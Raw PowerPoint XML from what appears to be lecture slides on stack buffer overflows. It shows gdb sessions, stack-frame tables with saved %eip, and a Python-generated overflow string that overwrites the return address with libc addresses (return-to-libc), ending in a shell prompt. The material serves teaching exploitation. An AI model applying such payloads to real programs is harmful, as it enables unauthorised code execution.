              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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0xb7e66310</a:t>
            </a:r>
            <a:endParaRPr lang="is-I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0xb7e66311</a:t>
            </a:r>
            <a:endParaRPr lang="is-I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0xb7e66314</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964403" y="85523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0xbffff680</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1728532575"/>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lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Continuing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>: 1: Syntax error: EOF in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>backquote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> substitution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xb7f8684d in ?? () from /lib/i386-linux-gnu/libc.so.6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>335</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5470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476872757"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7f8684c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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336</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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xbffff67c</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804843f</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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383301" y="485149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0" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738838" y="4486372"/>
            <a:ext cx="6256324" cy="1476243"/>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system</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sub $0x8,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0x10(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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0xb7e66310</a:t>
            </a:r>
            <a:endParaRPr lang="is-I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0xb7e66311</a:t>
            </a:r>
            <a:endParaRPr lang="is-I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0xb7e66314</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479670" y="686001"/>
            <a:ext cx="2831284" cy="340919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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479670" y="314299"/>
            <a:ext cx="2831284" cy="340919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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ight Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42485" y="100087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5" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964403" y="855239"/>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0xbffff680</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208471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34724013"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7f8684c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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337</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xbffff67c</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804843f</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endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383301" y="485149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0" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738838" y="4486372"/>
            <a:ext cx="6256324" cy="1476243"/>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system</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sub $0x8,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0x10(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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0xb7e66310</a:t>
            </a:r>
            <a:endParaRPr lang="is-I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0xb7e66311</a:t>
            </a:r>
            <a:endParaRPr lang="is-I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0xb7e66314</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="15" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1875334834"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3421667" y="303902"/>
          <a:ext cx="2831284" cy="109728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0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>arg0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="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saved</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> %</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>eip</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0">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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Right Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="42485" y="100087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366571603"/>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defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>e6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edcb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x4c\x68\xf8\xb7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'"`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Continuing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</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338</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
